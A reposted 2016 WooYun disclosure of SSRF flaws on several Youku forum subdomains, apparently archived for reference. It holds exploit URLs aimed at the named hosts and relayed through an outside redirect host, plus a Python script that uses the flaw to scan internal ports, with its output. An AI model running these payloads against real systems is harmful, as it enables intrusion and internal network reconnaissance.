WooYun.org-优酷多个分站存在SSRF漏洞大礼包

--------------------------------------------------------------

本系列只做已公开漏洞搬运，来源网络，侵权即删

---------------------------------------------------------------

漏洞概要

缺陷编号：wooyun-2016-0227883

漏洞标题：优酷多个分站存在SSRF漏洞大礼包

相关厂商：优酷

漏洞作者：Sunshie

提交时间：2016-07-11 09:54

修复时间：2016-07-11 18:06

公开时间：2016-07-11 18:06

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

分享漏洞：

漏洞详情

披露状态：

2016-07-11：细节已通知厂商并且等待厂商处理中
2016-07-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT

详细说明：

具体危害请看前面的例子

http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=
http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg

http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=
http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg

http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=
http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg

http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=
http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg

http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=
http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg

漏洞证明：

随便找个站扫下端口：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-11 09:28:01
import requests
import threading
import Queue
import time
threads_count = 1
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
    que.put(str(i))
def run():
    while que.qsize() > 0:
        p = que.get()
        try:
            url = "http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=
http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg
".format(
                port=p)
            time.sleep(0.3)
            r = requests.get(url,timeout=1.8)
        except:
            lock.acquire()
            print "{port}  Open".format(port=p)
            lock.release()
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
while que.qsize() > 0:
    time.sleep(1.0)

80  Open
9000  Open
11211  Open
22022  Open

修复方案：

禁止对内网资源访问，取外网资源的API部署在不属于自己的机房

版权声明：转载请注明来源 Sunshie@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-07-11 18:06

厂商回复：

首先感谢 Sunshie 对优酷安全的关注！经过与业务、运维沟通，确认漏洞中所涉及系统所在机房均与内网隔离，漏洞影响非常有限，暂不考虑修复。如果您有任何疑问，可随时与我们联系。再次感谢Sunshie！

最新状态：

暂无

漏洞评价：

评价

1. 2016-07-11 10:02 | linger118927 ( 路人 | Rank:8 漏洞数:1 | 坐吃等死)看你刷ssrf这么开心，来一波工具分享吧~~~O(∩_∩)O哈哈~
2. 2016-07-11 10:18 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)看你刷ssrf这么开心，来分享下心得把
3. 2016-07-11 11:05 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)这个实践有点快哦
4. 2016-07-11 11:24 | Best-shine ( 路人 | Rank:8 漏洞数:3 | 技术缺乏积淀，特来多加学习！)SSRF 求技术分享啊
5. 2016-07-11 11:32 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)@Best-shine 一看就是错过峰会的小伙伴
6. 2016-07-11 11:44 | Best-shine ( 路人 | Rank:8 漏洞数:3 | 技术缺乏积淀，特来多加学习！)@齐迹 我去了 只不过技术不是太好 想更多交流啊

注意：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关！~

走之前记得点个“在看”哟~

原文始发于微信公众号（从放弃到入门）：WooYun.org-优酷多个分站存在SSRF漏洞大礼包